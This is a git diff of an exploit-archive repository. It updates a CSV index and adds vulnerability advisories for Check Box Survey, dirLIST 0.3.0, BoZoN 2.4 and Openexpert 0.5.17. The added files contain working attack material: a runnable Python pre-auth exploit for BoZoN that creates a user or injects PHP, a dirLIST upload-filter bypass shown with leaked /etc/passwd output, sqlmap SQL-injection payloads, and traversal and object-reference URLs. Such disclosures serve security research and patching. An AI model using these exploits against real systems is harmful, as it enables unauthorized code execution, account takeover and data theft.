diff --git a/files.csv b/files.csv index c66a3ed06..cc6598e1d 100644 --- a/files.csv +++ b/files.csv @@ -17831,7 +17831,7 @@ id,file,description,date,author,platform,type,port 4171,platforms/php/webapps/4171.pl,"Mail Machine 3.989 - Local File Inclusion",2007-07-10,"H4 / XPK",php,webapps,0 4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution",2007-07-11,jmp-esp,php,webapps,0 4174,platforms/php/webapps/4174.txt,"PsNews 1.1 - (show.php newspath) Local File Inclusion",2007-07-12,irk4z,php,webapps,0 -4179,platforms/php/webapps/4179.php,"MkPortal 1.1.1 reviews / Gallery modules - SQL Injection",2007-07-12,Coloss,php,webapps,0 +4179,platforms/php/webapps/4179.php,"MKPortal 1.1.1 reviews / Gallery modules - SQL Injection",2007-07-12,Coloss,php,webapps,0 4180,platforms/php/webapps/4180.txt,"MKPortal NoBoard Module (Beta) - Remote File Inclusion",2007-07-14,g00ns,php,webapps,0 4182,platforms/php/webapps/4182.txt,"CMScout 1.23 - 'index.php' SQL Injection",2007-07-14,g00ns,php,webapps,0 4183,platforms/php/webapps/4183.txt,"eSyndiCat Directory Software - Multiple SQL Injections",2007-07-14,d3v1l,php,webapps,0 @@ -20480,7 +20480,7 @@ id,file,description,date,author,platform,type,port 7741,platforms/asp/webapps/7741.txt,"dMx READY (25 - Products) - Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0 7743,platforms/php/webapps/7743.txt,"Realtor 747 - 'define.php INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0 7744,platforms/asp/webapps/7744.txt,"Virtual Guestbook 2.1 - Remote Database Disclosure",2009-01-13,Moudi,asp,webapps,0 -7746,platforms/php/webapps/7746.txt,"Joomla! Component GigCalendar 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0 +7746,platforms/php/webapps/7746.txt,"Joomla! Component gigCalendar 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0 7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps,0 7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - 'cilla.cgi' Remote Command Execution",2009-01-13,ZeN,cgi,webapps,0 7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 - Contents Change",2009-01-13,ajann,asp,webapps,0 @@ -20511,10 +20511,10 @@ id,file,description,date,author,platform,type,port 7791,platforms/asp/webapps/7791.txt,"DMXReady Billboard Manager 1.1 - Arbitrary File Upload",2009-01-15,ajann,asp,webapps,0 7792,platforms/php/webapps/7792.txt,"GNUBoard 4.31.03 - (08.12.29) Local File Inclusion",2009-01-15,flyh4t,php,webapps,0 7793,platforms/php/webapps/7793.php,"Joomla! Component com_Eventing 1.6.x - Blind SQL Injection",2009-01-15,InjEctOr5,php,webapps,0 -7795,platforms/php/webapps/7795.txt,"Joomla! Component RD-Autos 1.5.5 - 'id' SQL Injection",2009-01-15,H!tm@N,php,webapps,0 -7796,platforms/php/webapps/7796.txt,"mkportal 1.2.1 - Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps,0 -7797,platforms/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - (clanek) Blind SQL Injection",2009-01-15,darkjoker,php,webapps,0 -7798,platforms/php/webapps/7798.txt,"Free Bible Search PHP Script - 'readbible.php' SQL Injection",2009-01-15,nuclear,php,webapps,0 +7795,platforms/php/webapps/7795.txt,"Joomla! Component RD-Autos 1.5.5 - SQL Injection",2009-01-15,H!tm@N,php,webapps,0 +7796,platforms/php/webapps/7796.txt,"MKPortal 1.2.1 - Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps,0 +7797,platforms/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Parameter Blind SQL Injection",2009-01-15,darkjoker,php,webapps,0 +7798,platforms/php/webapps/7798.txt,"Free Bible Search PHP Script - SQL Injection",2009-01-15,nuclear,php,webapps,0 7800,platforms/asp/webapps/7800.txt,"eFAQ - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0 7801,platforms/asp/webapps/7801.txt,"eReservations - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0 7802,platforms/asp/webapps/7802.txt,"The Walking Club - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0 @@ -20525,12 +20525,12 @@ id,file,description,date,author,platform,type,port 7809,platforms/php/webapps/7809.txt,"Aj Classifieds Real Estate 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0 7810,platforms/php/webapps/7810.txt,"Aj Classifieds Personals 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0 7811,platforms/php/webapps/7811.txt,"Aj Classifieds For Sale 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0 -7813,platforms/php/webapps/7813.txt,"Simple PHP NewsLetter 1.5 - (olang) Local File Inclusion",2009-01-16,ahmadbady,php,webapps,0 +7813,platforms/php/webapps/7813.txt,"Simple PHP NewsLetter 1.5 - Local File Inclusion",2009-01-16,ahmadbady,php,webapps,0 7814,platforms/php/webapps/7814.txt,"BibCiter 1.4 - Multiple SQL Injections",2009-01-16,nuclear,php,webapps,0 -7815,platforms/php/webapps/7815.txt,"Joomla! Component Gigcal 1.x - 'id' SQL Injection",2009-01-18,Lanti-Net,php,webapps,0 +7815,platforms/php/webapps/7815.txt,"Joomla! Component Gigcal 1.x - 'id' Parameter SQL Injection",2009-01-18,Lanti-Net,php,webapps,0 7816,platforms/asp/webapps/7816.txt,"DS-IPN.NET Digital Sales IPN - Database Disclosure",2009-01-18,Moudi,asp,webapps,0 7817,platforms/php/webapps/7817.txt,"Click&Email - Authentication Bypass",2009-01-18,SuB-ZeRo,php,webapps,0 -7818,platforms/php/webapps/7818.txt,"SCMS 1 - 'index.php p' Local File Inclusion",2009-01-18,ahmadbady,php,webapps,0 +7818,platforms/php/webapps/7818.txt,"SCMS 1 - Local File Inclusion",2009-01-18,ahmadbady,php,webapps,0 7819,platforms/php/webapps/7819.txt,"ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure",2009-01-18,bd0rk,php,webapps,0 7820,platforms/php/webapps/7820.pl,"Fhimage 1.2.1 - Remote Index Change Exploit",2009-01-19,Osirys,php,webapps,0 7821,platforms/php/webapps/7821.pl,"Fhimage 1.2.1 - Remote Command Execution (mq = off)",2009-01-19,Osirys,php,webapps,0 @@ -20573,7 +20573,7 @@ id,file,description,date,author,platform,type,port 7881,platforms/php/webapps/7881.txt,"Joomla! Component com_flashmagazinedeluxe - (mag_id) SQL Injection",2009-01-26,TurkGuvenligi,php,webapps,0 7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 - (MAX_type) Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps,0 7884,platforms/php/webapps/7884.txt,"Flax Article Manager 1.1 - Remote PHP Script Upload",2009-01-27,S.W.A.T.,php,webapps,0 -7885,platforms/php/webapps/7885.txt,"Max.Blog 1.0.6 - (show_post.php) SQL Injection",2009-01-27,"Salvatore Fresta",php,webapps,0 +7885,platforms/php/webapps/7885.txt,"Max.Blog 1.0.6 - 'show_post.php' SQL Injection",2009-01-27,"Salvatore Fresta",php,webapps,0 7886,platforms/php/webapps/7886.txt,"Pixie CMS 1.0 - Multiple Local File Inclusion",2009-01-27,DSecRG,php,webapps,0 7892,platforms/php/webapps/7892.php,"Community CMS 0.4 - (/index.php id) Blind SQL Injection",2009-01-28,darkjoker,php,webapps,0 7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion",2009-01-28,Encrypt3d.M!nd,php,webapps,0 @@ -20581,8 +20581,8 @@ id,file,description,date,author,platform,type,port 7895,platforms/php/webapps/7895.txt,"Gazelle CMS - 'template' Local File Inclusion",2009-01-28,fuzion,php,webapps,0 7896,platforms/php/webapps/7896.php,"Lore 1.5.6 - 'article.php' Blind SQL Injection",2009-01-28,OzX,php,webapps,0 7897,platforms/php/webapps/7897.php,"phpList 2.10.x - (Remote Code Execution by environ Inclusion) Local File Inclusion",2009-01-28,mozi,php,webapps,0 -7898,platforms/php/webapps/7898.txt,"Max.Blog 1.0.6 - (submit_post.php) SQL Injection",2009-01-28,"Salvatore Fresta",php,webapps,0 -7899,platforms/php/webapps/7899.txt,"Max.Blog 1.0.6 - (offline_auth.php) Offline Authentication Bypass",2009-01-28,"Salvatore Fresta",php,webapps,0 +7898,platforms/php/webapps/7898.txt,"Max.Blog 1.0.6 - 'submit_post.php' SQL Injection",2009-01-28,"Salvatore Fresta",php,webapps,0 +7899,platforms/php/webapps/7899.txt,"Max.Blog 1.0.6 - 'offline_auth.php' Offline Authentication Bypass",2009-01-28,"Salvatore Fresta",php,webapps,0 7900,platforms/php/webapps/7900.txt,"Social Engine - (category_id) SQL Injection",2009-01-28,snakespc,php,webapps,0 7901,platforms/php/webapps/7901.py,"SmartSiteCMS 1.0 - (articles.php var) Blind SQL Injection",2009-01-28,certaindeath,php,webapps,0 7905,platforms/php/webapps/7905.pl,"Personal Site Manager 0.3 - Remote Command Execution",2009-01-29,darkjoker,php,webapps,0 @@ -22361,7 +22361,7 @@ id,file,description,date,author,platform,type,port 11289,platforms/php/webapps/11289.txt,"Joomla! Component com_dms 2.5.1 - SQL Injection",2010-01-30,kaMtiEz,php,webapps,0 11290,platforms/php/webapps/11290.txt,"phpunity.newsmanager - Local File Inclusion",2010-01-30,kaMtiEz,php,webapps,0 11292,platforms/php/webapps/11292.txt,"Joomla! Component JE Event Calendar - SQL Injection",2010-01-30,B-HUNT3|2,php,webapps,0 -11294,platforms/php/webapps/11294.txt,"Joomla! Component com_simplefaq - 'catid' Blind SQL Injection",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps,0 +11294,platforms/php/webapps/11294.txt,"Joomla! Component com_simplefaq - 'catid' Parameter Blind SQL Injection",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps,0 11295,platforms/asp/webapps/11295.txt,"eWebeditor ASP Version - Multiple Vulnerabilities",2010-01-29,anonymous,asp,webapps,0 11296,platforms/php/webapps/11296.txt,"ThinkAdmin - 'page.php' SQL Injection",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps,0 11297,platforms/php/webapps/11297.txt,"IPB (nv2) Awards < 1.1.0 - SQL Injection (PoC)",2010-01-30,fred777,php,webapps,0 @@ -35544,7 +35544,7 @@ id,file,description,date,author,platform,type,port 37614,platforms/php/webapps/37614.txt,"PBBoard - 'index.php' Multiple Parameter SQL Injection",2012-08-08,"High-Tech Bridge",php,webapps,0 37615,platforms/php/webapps/37615.txt,"PBBoard - member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0 37616,platforms/php/webapps/37616.txt,"PBBoard - admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0 -37617,platforms/php/webapps/37617.txt,"dirLIST - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0 +37617,platforms/php/webapps/37617.txt,"dirLIST 0.3.0 - Local File Inclusion",2012-08-08,L0n3ly-H34rT,php,webapps,0 37620,platforms/php/webapps/37620.txt,"Joomla! Component 'com_docman' - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80 37623,platforms/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple Remote Code Execution Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0 37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - Cross-Site Request Forgery / Cross-Site Scripting",2015-07-16,"Pierre Kim",hardware,webapps,0 @@ -37019,3 +37019,7 @@ id,file,description,date,author,platform,type,port 41080,platforms/php/webapps/41080.txt,"Image Sharing Script 4.13 - Multiple Vulnerabilities",2017-01-16,"Hasan Emre Ozer",php,webapps,0 41081,platforms/php/webapps/41081.txt,"Million Pixels 3 - Authentication Bypass",2017-01-16,"Ihsan Sencan",php,webapps,0 41082,platforms/java/webapps/41082.txt,"ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities",2017-01-08,"Mehmet Ince",java,webapps,0 +41083,platforms/php/webapps/41083.txt,"dirLIST 0.3.0 - Arbitrary File Upload",2017-01-17,hyp3rlinx,php,webapps,0 +41084,platforms/php/webapps/41084.txt,"BoZoN 2.4 - Remote Code Execution",2017-01-17,hyp3rlinx,php,webapps,0 +41086,platforms/aspx/webapps/41086.txt,"Check Box 2016 Q2 Survey - Multiple Vulnerabilities",2017-01-17,"Fady Mohammed Osman",aspx,webapps,0 +41087,platforms/php/webapps/41087.txt,"Openexpert 0.5.17 - SQL Injection",2017-01-17,"Nassim Asrir",php,webapps,0 diff --git a/platforms/aspx/webapps/41086.txt b/platforms/aspx/webapps/41086.txt new file mode 100755 index 000000000..f603fb96d --- /dev/null +++ b/platforms/aspx/webapps/41086.txt @@ -0,0 +1,55 @@ +# Exploit Title: Check Box 2016 Q2 Survey Multiple Vulnerabilities +# Exploit Author: Fady Mohamed Osman (@fady_osman) +# Exploit-db : http://www.exploit-db.com/author/?a=2986 +# Youtube : https://www.youtube.com/user/cutehack3r +# Date: Jan 17, 2017 +# Vendor Homepage: https://www.checkbox.com/ +# Software Link: https://www.checkbox.com/free-checkbox-trial/ +# Version: Check Box 2016 Q2,Check Box 2016 Q4 - Fixed in Checkbox Survey, +Inc. v6.7 +# Tested on: Check Box 2016 Q2 Trial on windows Server 2012. +# Description : Checkbox is a survey application deployed by a number of +highly profiled companies and government entities like Microsoft, AT&T, +Vodafone, Deloitte, MTV, Virgin, U.S. State Department, U.S. Secret +Service, U.S. Necular Regulatory Comission, UNAIDS, State Of California +and more!! + +For a full list of their clients please visit: +https://www.checkbox.com/clients/ + +1- Directory traversal vulnerability : For example to download the +web.config file we can send a request as the following: +http://www.example.com/Checkbox/Upload.ashx?f=..\..\web.config&n=web.config + +2- Direct Object Reference : +attachments to surveys can be accessed directly without login as the +following: +https://www.victim.com/Checkbox/ViewContent.aspx?contentId=5001 +I created a script that can bruteforce the numbers to find ID's that will +download the attachment and you can easily write one on your own ;). + +3- Open redirection in login page for example: +https://www.victim.com/Checkbox/Login.aspx?ReturnUrl=http://www.google.com + +If you can't see why an open redirection is a problem in login page please +visit the following page: +https://www.asp.net/mvc/overview/security/preventing- +open-redirection-attacks + + +Timeline: +December 2016 - Discovered the vulnerability during Pen. Test conducted by +ZINAD IT for one of our clients. +Jan 12,2017 - Reported to vendor. +Jan 15,2017 - Sent a kind reminder to the vendor. +Jan 16,2017 - First Vendor Response said they will only consider directory +traversal as a vulnerability and that a fix will be sent in the next day. +Jan 16,2017 - Replied to explain why DOR and Open Redirect is a problem. +Jan 17,2017 - Patch Release Fixed the Directory Traversal. +Jan 17,2017 - Sent another email to confirm if DOR and open redirect wont +be fixed. +Jan 17,2017 - Open redirection confirmed to be fixed in the same patch +released before for DOR the vendor said they didn't believe that's a +security concern and that they have added a warning to let users know that +their attachments will be available to anyone with access to that survey page !! + diff --git a/platforms/php/webapps/41083.txt b/platforms/php/webapps/41083.txt new file mode 100755 index 000000000..2db988b00 --- /dev/null +++ b/platforms/php/webapps/41083.txt @@ -0,0 +1,165 @@ ++]################################################################################################### +[+] Credits / Discovery: John Page +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/DIRLIST-FILE-UPLOAD-BYPASS-CMD-EXEC.txt +[+] ISR: Apparition +[+]################################################################################################## + + + +Vendor: +=============== +sourceforge.net + + +Product: +=============== +dirList v0.3.0 + + +Download: +=========== +sourceforge.net/projects/dir-list/ + + +dirLIST displays files and folders in a given HTTP/FTP directory. It has a wonderful interface with choice of Thumbnail or List +view along with gorgeous icons for different file types. Includes a sleek gallery, web based mp3 player, file admin + more. + + + +Vulnerability Type: +====================================== +Bypass File Upload / CMD Execution + + + +CVE Reference: +=============== +N/A + + +Security Issue: +=============== + +When uploading "Banned" file types dirLIST replies with a base64 encoded error message. + +e.g. +dXBsb2FkX2Jhbm5lZA== + +Decoded it reads, "upload_banned". + + +Banned files are setup in the "config.php" file. + +$banned_file_types = array('.php', '.php3', '.php4', '.php5', '.htaccess', '.htpasswd', '.asp', '.aspx'); + +When upload a file, the check is made for banned file types. + +In "process_upload.php" on Line: 47 + +if(in_array(strtolower(strrchr($file_name, ".")), $banned_file_types)) + { + header("Location: ../index.php?folder=".$_POST['folder']."&err=".base64_encode("upload_banned")); + exit; + } + + +However, appending a semicolon ";" to end of our PHP file will skirt the security check allowing +us to upload a banned PHP file type, and our PHP file will be executed by server when accessed later. + +Apache manual: +“Files can have more than one extension, and the order of the extensions is normally irrelevant. For example, if the file welcome.html.fr +maps onto content type text/html and language French then the file welcome.fr.html will map onto exactly the same information. etc.. + +Therefore, a file named ‘file.php.1’, can be interpreted as a PHP file and be executed on server. +This usually works if the last extension is not specified in the list of mime-types known to the web server. + +Developers are usually unaware of the "Apache" feature to process files with some odd unexpected extension like PHP.1, PHP.; and such. + + +Tested on: + +Windows 7 +Bitnami wampstack-5.6.29-0. +Apache/2.4.23 (Win64) + +Linux +XAMPP 5.6.8-0 +Apache/2.4.12 (Unix) + + + +Exploit/POC: +============ + +1) Create a banned PHP file to upload named. + +"TEST.php.;" + +2) Upload to server using dirLIST. + + +3) Done! + + + + +Result: + +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +news:x:9:13:news:/etc/news: +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +gopher:x:13:30:gopher:/var/gopher:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +dbus:x:81:81:System message +bus:/:/sbin/nologin avahi:x:70:70:Avahi +daemon:/:/sbin/nologin + +etc... + + + +Network Access: +=============== +Remote + + + +Impact: +================= +System Takeover + + + +Severity: +=========== +High + + +Disclosure Timeline: +===================== +Vendor Notification: No Replies +January 17, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c) HYP3RLINX \ No newline at end of file diff --git a/platforms/php/webapps/41084.txt b/platforms/php/webapps/41084.txt new file mode 100755 index 000000000..ad5c73e4c --- /dev/null +++ b/platforms/php/webapps/41084.txt @@ -0,0 +1,111 @@ +[+]################################################################################################## +[+] Credits / Discovery: John Page +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/BOZON-PRE-AUTH-COMMAND-EXECUTION.txt +[+] ISR: ApparitionSec +[+]################################################################################################## + + + +Vendor: +============ +bozon.pw/en/ + + + +Product: +=========== +BoZoN 2.4 + +Bozon is a simple file-sharing app. Easy to install, free and open source Just copy BoZoN's files onto your server. + + +Vulnerability Type: +========================== +Pre-Auth Command Execution + + + +CVE Reference: +============== +N/A + + + +Security Issue: +================ + +A Bozon vulnerability allows unauthenticated attackers to add arbitrary users and inject system commands to the "auto_restrict_users.php" +file of the Bozon web interface. + +This issue results in arbitrary code execution on the affected host, attackers system commands will get written and stored to the PHP file +"auto_restrict_users.php" under the private/ directory of the Bozon application, making them persist. Remote attackers will get the command +responses from functions like phpinfo() as soon as the HTTP request has completed. + +In addition when an admin or user logs in or the webpage gets reloaded the attackers commands are then executed as they are stored. +If a Command is not injected to the "auto_restrict_users.php" file, unauthenticated attackers can opt to add user accounts at will. + + + +Exploit/POC: +============= + +import urllib,urllib2,time + +#Bozon v2.4 (bozon.pw/en/) Pre-Auth Remote Exploit +#Discovery / credits: John Page - Hyp3rlinx/Apparition +#hyp3rlinx.altervista.org +#Exploit: add user account | run phpinfo() command +#========================================================= + +EXPLOIT=0 +IP=raw_input("[Bozon IP]>") +EXPLOIT=int(raw_input("[Exploit Selection]> [1] Add User 'Apparition', [2] Execute phpinfo()")) + +if EXPLOIT==1: + CMD="Apparition" +else: + CMD='"];$PWN=''phpinfo();//''//"' + +if EXPLOIT != 0: + url = 'http://'+IP+'/BoZoN-master/index.php' + data = urllib.urlencode({'creation' : '1', 'login' : CMD, 'pass' : 'abc123', 'confirm' : 'abc123', 'token' : ''}) + req = urllib2.Request(url, data) + +response = urllib2.urlopen(req) +if EXPLOIT==1: + print 'Apparition user account created! password: abc123' +else: + print "Done!... waiting for phpinfo" + time.sleep(0.5) + print response.read() + + + + +Impact: +=============== +System Takeover + + + +Severity: +========= +High + + + +Disclosure Timeline: +==================================== +Vendor Notification: No Replies +January 17, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c) HYP3RLINX \ No newline at end of file diff --git a/platforms/php/webapps/41087.txt b/platforms/php/webapps/41087.txt new file mode 100755 index 000000000..db86e7ced --- /dev/null +++ b/platforms/php/webapps/41087.txt @@ -0,0 +1,48 @@ +# Title : Openexpert 0.5.17 - Sql Injection +# Author: Nassim Asrir +# Author Company: Henceforth +# Tested on: Winxp sp3 - win7 +# Vendor: https://sourceforge.net/projects/law-expert/ +# Download Software: https://sourceforge.net/projects/law-expert/files/ + +################################################# + +## About The Product : ## + +OpenExpert. Dual use Web based and Easy to Use Expert System or Education System. + +## Vulnerability : ## + +- Vulnerable Parametre : area_id + +- HTTP Method : GET + +- To exploit it : http://HOST/expert_wizard.php?area_id=1' + +- Sqlmap Output : + +Parameter: area_id (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: area_id=1 AND 4961=4961 + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: area_id=1 AND (SELECT 8855 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(8855=8855,1))),0x71626b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: area_id=1 AND SLEEP(5) +--- +[15:35:38] [INFO] the back-end DBMS is MySQL +web server operating system: Windows +web application technology: Apache 2.4.23, PHP 5.6.26 +back-end DBMS: MySQL >= 5.0 +[15:35:38] [INFO] fetching database names +[15:35:39] [INFO] the SQL query used returns 5 entries +[15:35:39] [INFO] retrieved: information_schema +[15:35:39] [INFO] retrieved: mysql +[15:35:39] [INFO] retrieved: performance_schema +[15:35:39] [INFO] retrieved: sys +[15:35:39] [INFO] retrieved: test + diff --git a/platforms/windows/local/19143.c b/platforms/windows/local/19143.c index 2c63b3eb1..bf492adad 100755 --- a/platforms/windows/local/19143.c +++ b/platforms/windows/local/19143.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/180/info Beginning April 1, 2001 and continuing through April 8, 2001, Windows applications will be offset by one hour - even though the system clock will show the proper time. This is due to the MSVCRT.DLL not correctly interpreting Daylight Savings time during any year in which April 1st falls on a Sunday. In these instances, the DLL is fooled into thinking that DST begins one week later on April 8th. MSVCRT.DLL shipping with MS VC++ versions 4.1, 4.2, 5.0 and 6.0 are thought to be vulnerable. +*/ // // APRIL1.C -- Simple test program for the "April's Fools 2001" bug